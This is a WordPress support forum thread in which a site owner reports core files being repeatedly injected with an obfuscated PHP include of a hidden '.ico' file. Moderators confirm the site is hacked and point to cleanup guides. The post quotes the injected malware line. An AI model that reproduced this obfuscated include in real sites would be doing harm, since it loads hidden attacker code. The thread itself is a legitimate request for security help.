Title: Suspicious code
Last modified: November 6, 2018

---

# Suspicious code

 *  Resolved [designer13421321](https://wordpress.org/support/users/nistuj817/)
 * (@nistuj817)
 * [7 years, 5 months ago](https://wordpress.org/support/topic/suspicious-code-4/)
 * Just about every day, I get alerts on core WordPress files being modified in 
   such a way. Random text like this: [@include](https://wordpress.org/support/users/include/)“\
   057/hom\145/cle\141rbel\151efs7\057publ\151c_ht\155l/wp\055incl\165des/\143ss/.\
   070a14b\07061.i\143o”;
    is inserted into the index.php, wp-config, and wp-settings.
   php files. Also some files like wp-includes/css/.8a14b861.ico are generated. 
   I go through every day and restore these files back to normal, but it KEEPS HAPPENING.
   It’s so annoying and I need to prevent this once and for all.
 * Wordfence says: The infection type is: Suspicious:PHP/obfuicoinclude
    Description:
   Suspicious code often added by attackers
 * I’ve gotten all plugins and themes up to date, and even added define(‘DISALLOW_FILE_EDIT’,
   true); in the wp-config file. Help!
 * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fsuspicious-code-4%2F%3Foutput_format%3Dmd&locale=en_US)
   to see the link]_

Viewing 5 replies - 1 through 5 (of 5 total)

 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [7 years, 5 months ago](https://wordpress.org/support/topic/suspicious-code-4/#post-10851324)
 * Carefully follow [this guide](https://codex.wordpress.org/FAQ_My_site_was_hacked).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://codex.wordpress.org/Hardening_WordPress).
    -  This reply was modified 7 years, 5 months ago by [t-p](https://wordpress.org/support/users/t-p/).
    -  This reply was modified 7 years, 5 months ago by [t-p](https://wordpress.org/support/users/t-p/).
 *  Thread Starter [designer13421321](https://wordpress.org/support/users/nistuj817/)
 * (@nistuj817)
 * [7 years, 5 months ago](https://wordpress.org/support/topic/suspicious-code-4/#post-10851335)
 * That’s what notifies me of the alerts to begin with. Well, it’s not sending me
   email notifications anymore, but when looking into the scans it’s telling me 
   about the file changes and stuff. It’s not preventing anything though, why I 
   need. I need to stop this.
 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [7 years, 5 months ago](https://wordpress.org/support/topic/suspicious-code-4/#post-10851340)
 * Are you referring to wordfence plugin?
 * If so, I recommend asking at [https://wordpress.org/support/plugin/wordfence](https://wordpress.org/support/plugin/wordfence)
   so the plugin’s developers and support community can help you with this.
 *  Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/)
 * (@sterndata)
 * Volunteer Forum Moderator
 * [7 years, 5 months ago](https://wordpress.org/support/topic/suspicious-code-4/#post-10853546)
 * You’ve been hacked.
 * Get a fresh cup of coffee, take a deep breath and carefully follow [this guide](https://codex.wordpress.org/FAQ_My_site_was_hacked).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://codex.wordpress.org/Hardening_WordPress).
 * If you’re unable to clean your site(s) successfully, there are reputable organizations
   that can clean your sites for you. Sucuri and Wordfence are a couple.
 *  Thread Starter [designer13421321](https://wordpress.org/support/users/nistuj817/)
 * (@nistuj817)
 * [7 years, 5 months ago](https://wordpress.org/support/topic/suspicious-code-4/#post-10854850)
 * Did those yesterday and scans have since been coming back cleanr

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘Suspicious code’ is closed to new replies.

## Tags

 * [suspicious code](https://wordpress.org/support/topic-tag/suspicious-code/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 5 replies
 * 3 participants
 * Last reply from: [designer13421321](https://wordpress.org/support/users/nistuj817/)
 * Last activity: [7 years, 5 months ago](https://wordpress.org/support/topic/suspicious-code-4/#post-10854850)
 * Status: resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics